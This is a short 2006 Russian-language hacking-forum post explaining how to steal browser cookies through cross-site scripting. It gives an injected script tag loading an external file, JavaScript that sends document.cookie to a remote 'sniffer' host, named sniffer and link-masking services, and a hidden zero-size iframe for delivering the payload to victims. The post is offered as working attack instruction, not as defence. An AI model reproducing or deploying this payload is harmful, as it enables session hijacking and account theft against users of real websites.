25.05.2006, 22:21
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами:
11058146
Репутация:
4536
|
|
Для ознакомления:
https://forum.antichat.ru/thread18719.html
Чтобы куки украсть достаточно в уязвимом параметре написать:
Код:
<srcipt src=http://site.ru/js.js></script>
В самом файле js.js
Код:
img = new Image();
img.src = "http://sniffer/sn.php?"+document.cookie;
Этот способ хорош тем, что работает даже там, где фильтруються ковычки.
Зарегить сниффер можно на http://antichat.org/sniffer or http://s.netsec.ru/
Замаскировать линк можно http://loc.netsec.ru/
Но лучше делать в ифрейме, например
Код:
<iframe src="http://site.ru/?para=<script src=http://site.ru/js.js></script>" frameborder="0" widht="0" height="0">
Что не понятно - спрашивай. |
|
|